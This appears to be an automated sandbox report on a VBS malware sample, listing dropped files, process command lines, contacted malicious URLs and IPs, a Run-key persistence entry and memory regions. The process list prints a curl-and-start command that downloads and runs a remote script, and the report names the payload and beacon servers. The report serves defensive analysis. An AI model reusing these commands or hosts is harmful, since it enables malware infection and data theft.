Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
672365339196e.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\Users\Public\6723653391970.vbs
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\hcx.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\_672365339188b\7zxa.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\_672365339188b\BLOCKBUSTER.exe
|
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\_672365339188b\unrar.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\wewewe[1].zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\_672365339188b\BLOCKBUSTER.dll
|
data
|
dropped
|
||
C:\_672365339188b\MPDK.bat
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\_672365339188b\downloaded.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\672365339196e.vbs"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs
|
||
C:\Windows\System32\curl.exe
|
curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
|
||
C:\_672365339188b\BLOCKBUSTER.exe
|
"C:\_672365339188b\BLOCKBUSTER.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /c ipconfig /flushdns
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\ipconfig.exe
|
ipconfig /flushdns
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 127.0.0.1
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 127.0.0.1
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 127.0.0.1
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im BLOCKBUSTER.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\Conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 60 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://tgb5255365e.servegame.com:2530/
|
70.34.247.142
|
||
http://64.95.10.38/wewewe.zip
|
64.95.10.38
|
||
https://endesa.cli
|
unknown
|
||
http://64.95.10.38/contador/index.php?nomepc=user-PC
|
64.95.10.38
|
||
http://www.ghisler.com/plugins.htm
|
unknown
|
||
http://www.scootersoftware.com.
|
unknown
|
||
http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
|
unknown
|
||
http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
|
unknown
|
||
http://www.embarcadero.com/products/delphi
|
unknown
|
||
http://www.scootersoftware.com/bugRepMailer.php
|
unknown
|
||
http://www.scootersoftware.com/upgradee/
|
unknown
|
||
https://endesa.click/672365339188b/6723653391970.vbs
|
68.65.122.45
|
||
http://worldtimeapi.org/api/ip
|
unknown
|
||
http://www.totalcmd.net/directory/packer.html
|
unknown
|
||
http://www.indyproject.org/
|
unknown
|
||
https://endesa.clic
|
unknown
|
||
http://www.scootersoftware.com/buynow?bld=%dS
|
unknown
|
||
http://64.95.10.38/contador/index.php?nomepc=user-PC_Classes
|
unknown
|
||
http://www.scootersoftware.com/upgrade
|
unknown
|
||
http://www.scootersoftware.com/
|
unknown
|
||
http://www.scootersoftware.com/buynow?bld=%d
|
unknown
|
||
http://70.34.247.142/UPLOADMAISL.phpU
|
unknown
|
||
http://www.scootersoftware.com/support.php
|
unknown
|
||
http://64.95.10.38/wewewe.zipj
|
unknown
|
||
https://endesa.click/672365339188b/6723653391970.vbsWinsta0
|
unknown
|
||
https://endesa.click/672365339188b/6723653391970.vbscurl
|
unknown
|
||
http://www.scootersoftware.com/download.phpS
|
unknown
|
||
http://www.scootersoftware.com/download.php
|
unknown
|
||
http://worldtimeapi.org/api/ip=C:
|
unknown
|
||
http://64.95.10.38/contador/index.php?nomepc=
|
unknown
|
||
https://endesa.click/672365339188b/6723653391970.vbs~E
|
unknown
|
||
http://www.scootersoftware.com/v3formats
|
unknown
|
||
http://www.scootersoftware.com/upgradeite
|
unknown
|
||
http://www.secureblackbox.com
|
unknown
|
||
http://64.95.10.38/wewewe.zip5EE
|
unknown
|
||
http://www.scootersoftware.com/upgrade0
|
unknown
|
There are 26 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
tgb5255365e.servegame.com
|
70.34.247.142
|
||
endesa.click
|
68.65.122.45
|
||
worldtimeapi.org
|
213.188.196.246
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
70.34.247.142
|
tgb5255365e.servegame.com
|
United States
|
||
64.95.10.38
|
unknown
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
213.188.196.246
|
worldtimeapi.org
|
Italy
|
||
68.65.122.45
|
endesa.click
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
|
Implementing
|
||
HKEY_CURRENT_USER\SOFTWARE\Scooter Software\Beyond Compare 3
|
CacheID
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
BLOCKBUSTER
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
B5BC000
|
direct allocation
|
page read and write
|
||
2A55000
|
heap
|
page read and write
|
||
28C4A0AC000
|
heap
|
page read and write
|
||
28C49F62000
|
heap
|
page read and write
|
||
A256000
|
direct allocation
|
page read and write
|
||
28C48248000
|
heap
|
page read and write
|
||
CC70000
|
trusted library allocation
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
68D8000
|
unkown
|
page execute read
|
||
2C61000
|
heap
|
page read and write
|
||
28C48CE8000
|
heap
|
page read and write
|
||
28C492ED000
|
heap
|
page read and write
|
||
28C4A238000
|
heap
|
page read and write
|
||
B6C2000
|
direct allocation
|
page read and write
|
||
955A000
|
unkown
|
page readonly
|
||
94FC000
|
unkown
|
page readonly
|
||
3330000
|
heap
|
page read and write
|
||
331F000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
1C44D3AE000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2B41000
|
direct allocation
|
page read and write
|
||
28C48458000
|
heap
|
page read and write
|
||
42C000
|
unkown
|
page execute read
|
||
1C44D3A5000
|
heap
|
page read and write
|
||
28C4A7E4000
|
heap
|
page read and write
|
||
28C4932E000
|
heap
|
page read and write
|
||
28C4A0AC000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C49898000
|
heap
|
page read and write
|
||
23979970000
|
heap
|
page read and write
|
||
3367000
|
heap
|
page read and write
|
||
297B000
|
heap
|
page read and write
|
||
1C44D4B0000
|
remote allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C47F82000
|
heap
|
page read and write
|
||
28C48D07000
|
heap
|
page read and write
|
||
28C48CE6000
|
heap
|
page read and write
|
||
28C4A48B000
|
heap
|
page read and write
|
||
9292000
|
unkown
|
page read and write
|
||
950F000
|
unkown
|
page readonly
|
||
28C49DD7000
|
heap
|
page read and write
|
||
28C47F41000
|
heap
|
page read and write
|
||
A85E000
|
stack
|
page read and write
|
||
928B000
|
unkown
|
page write copy
|
||
A2F0000
|
direct allocation
|
page read and write
|
||
28C42E50000
|
heap
|
page read and write
|
||
23979A1D000
|
heap
|
page read and write
|
||
EC0000
|
heap
|
page read and write
|
||
278D000
|
stack
|
page read and write
|
||
2740000
|
heap
|
page read and write
|
||
28C49478000
|
heap
|
page read and write
|
||
2DEE000
|
stack
|
page read and write
|
||
2B4D000
|
stack
|
page read and write
|
||
122FF000
|
heap
|
page read and write
|
||
3210000
|
heap
|
page read and write
|
||
32C9000
|
heap
|
page read and write
|
||
95E8000
|
unkown
|
page readonly
|
||
28C4246E000
|
heap
|
page read and write
|
||
28C4A760000
|
heap
|
page read and write
|
||
28C423FA000
|
heap
|
page read and write
|
||
28C488DC000
|
heap
|
page read and write
|
||
28C4A48A000
|
heap
|
page read and write
|
||
2FE9000
|
heap
|
page read and write
|
||
28C484DC000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
B6C9000
|
direct allocation
|
page read and write
|
||
28C493B2000
|
heap
|
page read and write
|
||
95A2000
|
unkown
|
page readonly
|
||
B5CB000
|
direct allocation
|
page read and write
|
||
28C48D18000
|
heap
|
page read and write
|
||
9187000
|
unkown
|
page write copy
|
||
A5F9000
|
direct allocation
|
page read and write
|
||
2A8E000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2A4F000
|
unkown
|
page read and write
|
||
28C48750000
|
heap
|
page read and write
|
||
220D7090000
|
heap
|
page read and write
|
||
ACF000
|
unkown
|
page read and write
|
||
330F000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
B0A000
|
unkown
|
page read and write
|
||
1C44D3F4000
|
heap
|
page read and write
|
||
28C48D07000
|
heap
|
page read and write
|
||
28C48816000
|
heap
|
page read and write
|
||
2AF0000
|
direct allocation
|
page read and write
|
||
28C423F6000
|
heap
|
page read and write
|
||
220D37C0000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
967F000
|
unkown
|
page readonly
|
||
28C48D07000
|
heap
|
page read and write
|
||
EB3000
|
heap
|
page read and write
|
||
28C4A4CC000
|
heap
|
page read and write
|
||
28C4A868000
|
heap
|
page read and write
|
||
28C48582000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
956A000
|
unkown
|
page readonly
|
||
23979A00000
|
heap
|
page read and write
|
||
28C49D94000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2767000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
E61000
|
heap
|
page read and write
|
||
28C4A1B4000
|
heap
|
page read and write
|
||
E0E000
|
stack
|
page read and write
|
||
28C496CA000
|
heap
|
page read and write
|
||
2AA0000
|
direct allocation
|
page read and write
|
||
9533000
|
unkown
|
page readonly
|
||
95FC000
|
unkown
|
page readonly
|
||
2790000
|
heap
|
page read and write
|
||
28C48D07000
|
heap
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
28C4246E000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
23E0000
|
heap
|
page read and write
|
||
2830000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
38A0000
|
heap
|
page read and write
|
||
28C423FD000
|
heap
|
page read and write
|
||
276A000
|
heap
|
page read and write
|
||
D7F5000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
A211000
|
direct allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48AAA000
|
heap
|
page read and write
|
||
2A90000
|
direct allocation
|
page read and write
|
||
28C4A658000
|
heap
|
page read and write
|
||
2990000
|
heap
|
page read and write
|
||
A1CC000
|
direct allocation
|
page read and write
|
||
963B000
|
unkown
|
page readonly
|
||
B13000
|
unkown
|
page read and write
|
||
28C49BB0000
|
heap
|
page read and write
|
||
5481000
|
unkown
|
page execute read
|
||
28C4911E000
|
heap
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
28C4A7E4000
|
heap
|
page read and write
|
||
2FCD000
|
stack
|
page read and write
|
||
3F76AFA000
|
stack
|
page read and write
|
||
2860000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
1C44D290000
|
heap
|
page read and write
|
||
28C48D13000
|
heap
|
page read and write
|
||
2C80000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48E06000
|
heap
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
28C4A383000
|
heap
|
page read and write
|
||
28C48A26000
|
heap
|
page read and write
|
||
28C49FA4000
|
heap
|
page read and write
|
||
91C0000
|
unkown
|
page read and write
|
||
9639000
|
unkown
|
page readonly
|
||
2390000
|
heap
|
page read and write
|
||
28C4808A000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
2EED000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
23979A35000
|
heap
|
page read and write
|
||
28C4A92E000
|
heap
|
page read and write
|
||
28C48CD0000
|
heap
|
page read and write
|
||
2FCF000
|
heap
|
page read and write
|
||
231C000
|
stack
|
page read and write
|
||
220D3840000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
3356000
|
heap
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
2C80000
|
heap
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
1C44D3AD000
|
heap
|
page read and write
|
||
6C87000
|
unkown
|
page execute read
|
||
28C49814000
|
heap
|
page read and write
|
||
28C491A2000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C49C34000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C49E5A000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A7E4000
|
heap
|
page read and write
|
||
28C423EB000
|
heap
|
page read and write
|
||
2B39000
|
direct allocation
|
page read and write
|
||
33AA000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48D01000
|
heap
|
page read and write
|
||
28E0000
|
heap
|
page read and write
|
||
28C48CFE000
|
heap
|
page read and write
|
||
3040000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
1303C000
|
stack
|
page read and write
|
||
2390000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
AE07000
|
stack
|
page read and write
|
||
7CB6000
|
unkown
|
page execute read
|
||
E3E000
|
heap
|
page read and write
|
||
28C4246E000
|
heap
|
page read and write
|
||
28BE000
|
unkown
|
page read and write
|
||
A52A000
|
direct allocation
|
page read and write
|
||
F29000
|
heap
|
page read and write
|
||
9289000
|
unkown
|
page read and write
|
||
AF5E000
|
stack
|
page read and write
|
||
CC30000
|
direct allocation
|
page execute and read and write
|
||
5410000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2B6C000
|
direct allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
3490000
|
heap
|
page read and write
|
||
2AAE000
|
direct allocation
|
page read and write
|
||
28C4A407000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
1A0000
|
heap
|
page read and write
|
||
28C49580000
|
heap
|
page read and write
|
||
2DB0000
|
heap
|
page read and write
|
||
94F5000
|
unkown
|
page readonly
|
||
28C495C2000
|
heap
|
page read and write
|
||
27F0000
|
heap
|
page read and write
|
||
6FCF5000
|
unkown
|
page readonly
|
||
2270000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
1C44D530000
|
heap
|
page read and write
|
||
28C498DA000
|
heap
|
page read and write
|
||
D5C4000
|
direct allocation
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
9550000
|
unkown
|
page readonly
|
||
DC0000
|
heap
|
page read and write
|
||
9619000
|
unkown
|
page readonly
|
||
32B6000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
950D000
|
unkown
|
page readonly
|
||
AF10000
|
remote allocation
|
page read and write
|
||
387F000
|
stack
|
page read and write
|
||
91A2000
|
unkown
|
page write copy
|
||
28C48D82000
|
heap
|
page read and write
|
||
3630000
|
heap
|
page read and write
|
||
6FD02000
|
unkown
|
page readonly
|
||
28C49E18000
|
heap
|
page read and write
|
||
EC2000
|
heap
|
page read and write
|
||
38A0000
|
heap
|
page read and write
|
||
9625000
|
unkown
|
page readonly
|
||
95B1000
|
unkown
|
page readonly
|
||
2C61000
|
heap
|
page read and write
|
||
D88E000
|
heap
|
page read and write
|
||
1C44D490000
|
heap
|
page read and write
|
||
220D5330000
|
heap
|
page read and write
|
||
28C48D04000
|
heap
|
page read and write
|
||
23DE000
|
stack
|
page read and write
|
||
9560000
|
unkown
|
page readonly
|
||
28C4A760000
|
heap
|
page read and write
|
||
28C4870E000
|
heap
|
page read and write
|
||
B34E000
|
stack
|
page read and write
|
||
28C4A69B000
|
heap
|
page read and write
|
||
239799E0000
|
heap
|
page read and write
|
||
28C48392000
|
heap
|
page read and write
|
||
B648000
|
direct allocation
|
page read and write
|
||
28C4A406000
|
heap
|
page read and write
|
||
28C48F92000
|
heap
|
page read and write
|
||
2B0D000
|
direct allocation
|
page read and write
|
||
273B000
|
heap
|
page read and write
|
||
2897000
|
heap
|
page read and write
|
||
28C423EB000
|
heap
|
page read and write
|
||
953D000
|
unkown
|
page readonly
|
||
3000000
|
heap
|
page read and write
|
||
28C48CDC000
|
heap
|
page read and write
|
||
32C9000
|
heap
|
page read and write
|
||
270E000
|
unkown
|
page read and write
|
||
A430000
|
direct allocation
|
page read and write
|
||
A22F000
|
direct allocation
|
page read and write
|
||
28C48648000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48B2E000
|
heap
|
page read and write
|
||
220D37DE000
|
heap
|
page read and write
|
||
3367000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
9163000
|
unkown
|
page write copy
|
||
28C423FB000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
A1B0000
|
direct allocation
|
page read and write
|
||
6FCFF000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
64FF000
|
unkown
|
page execute read
|
||
28C48CE2000
|
heap
|
page read and write
|
||
AF10000
|
trusted library allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
B64B000
|
direct allocation
|
page read and write
|
||
8AC0000
|
unkown
|
page execute read
|
||
2B10000
|
heap
|
page read and write
|
||
28C488DC000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
CC70000
|
trusted library allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
28C48D0B000
|
heap
|
page read and write
|
||
23979A2B000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48A68000
|
heap
|
page read and write
|
||
1C44D390000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
2AFD000
|
stack
|
page read and write
|
||
28C48141000
|
heap
|
page read and write
|
||
28C48DC4000
|
heap
|
page read and write
|
||
28C481C4000
|
heap
|
page read and write
|
||
B95A2FF000
|
stack
|
page read and write
|
||
28C4A448000
|
heap
|
page read and write
|
||
28C4991D000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
D874000
|
heap
|
page read and write
|
||
D7EB000
|
heap
|
page read and write
|
||
9175000
|
unkown
|
page write copy
|
||
501F5FE000
|
stack
|
page read and write
|
||
28C48F92000
|
heap
|
page read and write
|
||
28C48351000
|
heap
|
page read and write
|
||
EB4000
|
heap
|
page read and write
|
||
2AD0000
|
heap
|
page read and write
|
||
D8C0000
|
heap
|
page read and write
|
||
28C48CE3000
|
heap
|
page read and write
|
||
28C48CDC000
|
heap
|
page read and write
|
||
A0F6000
|
unkown
|
page readonly
|
||
23979A0E000
|
heap
|
page read and write
|
||
2A00000
|
heap
|
page read and write
|
||
9296000
|
unkown
|
page readonly
|
||
95FE000
|
unkown
|
page readonly
|
||
2767000
|
heap
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
A750000
|
heap
|
page read and write
|
||
916F000
|
unkown
|
page read and write
|
||
8E000
|
stack
|
page read and write
|
||
28C4830E000
|
heap
|
page read and write
|
||
28C48CEC000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
1C44D4B0000
|
remote allocation
|
page read and write
|
||
2A60000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
122E1000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
28C48416000
|
heap
|
page read and write
|
||
28C4A9C3000
|
heap
|
page read and write
|
||
28C485C4000
|
heap
|
page read and write
|
||
28C4A3C4000
|
heap
|
page read and write
|
||
28C48CDC000
|
heap
|
page read and write
|
||
28C4A4CC000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A970000
|
heap
|
page read and write
|
||
1C44D3C9000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28F7000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
28C49E9C000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C492EC000
|
heap
|
page read and write
|
||
23979A0E000
|
heap
|
page read and write
|
||
28C4246E000
|
heap
|
page read and write
|
||
11FF000
|
stack
|
page read and write
|
||
7808000
|
unkown
|
page execute read
|
||
A274000
|
direct allocation
|
page read and write
|
||
2B5D000
|
direct allocation
|
page read and write
|
||
B16000
|
unkown
|
page read and write
|
||
28C48D10000
|
heap
|
page read and write
|
||
6E3C000
|
unkown
|
page execute read
|
||
34B0000
|
heap
|
page read and write
|
||
ACB000
|
unkown
|
page read and write
|
||
227D000
|
stack
|
page read and write
|
||
2AA7000
|
direct allocation
|
page read and write
|
||
28C4991C000
|
heap
|
page read and write
|
||
220D5334000
|
heap
|
page read and write
|
||
28C491E4000
|
heap
|
page read and write
|
||
AEC000
|
unkown
|
page write copy
|
||
28C48858000
|
heap
|
page read and write
|
||
28C497D2000
|
heap
|
page read and write
|
||
28C4A970000
|
heap
